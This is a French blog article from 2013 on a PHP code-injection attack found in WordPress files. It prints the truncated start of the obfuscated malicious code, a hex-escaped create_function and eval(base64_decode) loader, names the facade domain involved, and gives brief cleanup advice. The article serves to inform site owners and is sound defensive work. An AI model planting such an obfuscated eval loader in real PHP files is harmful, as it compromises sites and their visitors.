Nouvelle attaque Worpdress par injection de code PHP

05.06.2013 | Réseau Dumac
2113 visiteurs  -  Aucun commentaire
Ce code malicieux sévit depuis longtemps (voir l’article) et repose sur PHP : il n’est pas exclusivement actif sur WordPress, et a été repéré sur des plateformes e-commerce comme OSCommerce. De même, l’association avec Joomla ! est plausible également.

Le code malicieux présent dans les fichiers Worpress commence ainsi :

< ?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework("", "\x7d\73\x40\145\x76\141\x6c\50\x40\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x4a\107

Une fois décodé, voici le PHP :

<?  $zend_framework="create_function"; @error_reporting(0); $zend_framework("", "};@eval(@base64_decode("//"); ?>

En utilisant le decode base64, on arrive à des-obfusquer afin d’y voir un peu plus clair, mais il reste énormément d’imbrications de lignes codées à base de fonctions eval() Une fonction est créée, dont on ne sait pas avec cet extrait ce qu’elle exécute. Mis à part que globalement, les sites touchés sont complètement inutilisables .

Ce code malicieux a été percé à jour depuis Janvier 2012. On y retrouve l’adresse d’un site web : http://f528764d624db129b32c21fbca0cb8d6.com/ qui n’est qu’une façade et intègre dans un jeu de cadres la page officielle d’AWstats (http://awstats.sourceforge.net)

Il est très probable que les visiteurs soient loggués et selon leur configuration matérielle/logicielle, attaqués au moyen d’un malware appelé depuis le navigateur.

Comment nettoyer ? En retirant ce script, souvent trouvé en fin de code PHP. Bien entendu, prenez vos précautions : sauvegardez vos bases, etc...

Source du script décodé : http://www.thehosthelpers.com/technical-help/help-de-obfsucating-code/5/ ?wap2

Dans la même rubrique

Derniers Commentaires

Articles récemment mis à jour

Too Cool for Internet Explorer

Reseau Dumac : le site des anciens étudiants du diplôme universitaire média interactif et ses applications est motorisé par le logiciel libre Spip 1.8.3 associé au squelette graphique BliP 0.91

17 rubriques ... 176 articles ... 2 commentaires ... 63 sites référencés ... 7 visiteurs par jour (133270 au total)

Haut de page | XHTML 1.0 | CSS 2